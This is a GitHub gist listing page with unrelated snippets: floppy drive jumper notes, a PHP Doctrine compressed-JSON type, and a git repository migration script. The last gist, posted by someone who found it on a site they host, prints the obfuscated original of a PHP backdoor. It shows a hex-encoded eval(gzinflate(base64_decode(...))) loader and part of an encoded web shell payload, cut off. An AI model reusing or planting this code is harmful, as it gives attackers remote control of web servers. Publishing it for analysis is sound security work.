Skip to content

Instantly share code, notes, and snippets.

Without modification

  • Chinon FB-354
  • Chinon FZ-354
  • Chinon FZ-354A
  • Chinon FZ-357
  • Chinon FZ-357A/B
  • NEC FD1035
  • NEC FD1036 A
  • Panasonic JU-253-033P
  • To make it work, set MS/MD to MD, 0/1/2/3 to 0, RY/DC to RY.
@baileyp
baileyp / CompressedJsonArrayType.php
Last active December 8, 2022 09:16
My implementation of adding compression to Doctrine's JsonArrayType. Helpful when storing large amounts of data and running into issues with max_allowed_packet issues in MySQL (or similar)
<?php
/**
* CompressedJsonArrayType Doctrine Type
*
* Consider adding the following to the "require" section of your composer.json
*
* "ext-zlib": "*",
*
* @license MIT
*/
@niksumeiko
niksumeiko / git.migrate
Last active April 1, 2025 12:46
Moving git repository and all its branches, tags to a new remote repository keeping commits history
#!/bin/bash
# Sometimes you need to move your existing git repository
# to a new remote repository (/new remote origin).
# Here are a simple and quick steps that does exactly this.
#
# Let's assume we call "old repo" the repository you wish
# to move, and "new repo" the one you wish to move to.
#
### Step 1. Make sure you have a local copy of all "old repo"
### branches and tags.
@chendo
chendo / 1_original.php
Last active May 11, 2017 14:30
Found a PHP backdoor on some site I help host. Below is the obfuscated version and the unobfuscation.
<?php
//$auth_pass = "8a4bf282852bf4c49e17f0951f645e72";
//$color = "#df5";
//$default_action = "FilesMan";
//$default_charset = "Windows-1251";
//preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e4f8yB2o244nyKQSB64Q2/qlm1ov9PD4yO7yuxmbZMqjU08SucezfplwQmPhvNpH4lgn06PoS+8WeQ70diFHiGW4ECPQjeeh1PmRV3OKDLxOWccQD8r2ykMNnYcB2uxPNRA3iNo9kel7vvj0zNgwgwJlIBwAKYIXUTB22DkTcuctoHnlq3tPjCIG3a2gfUmbOLG42DQBr6KO++dKFoE4aDFtr3pbB6z+HbmtmfiK5s6E/7W0ZOjeQ8an107/txt252O3dneQMzwRx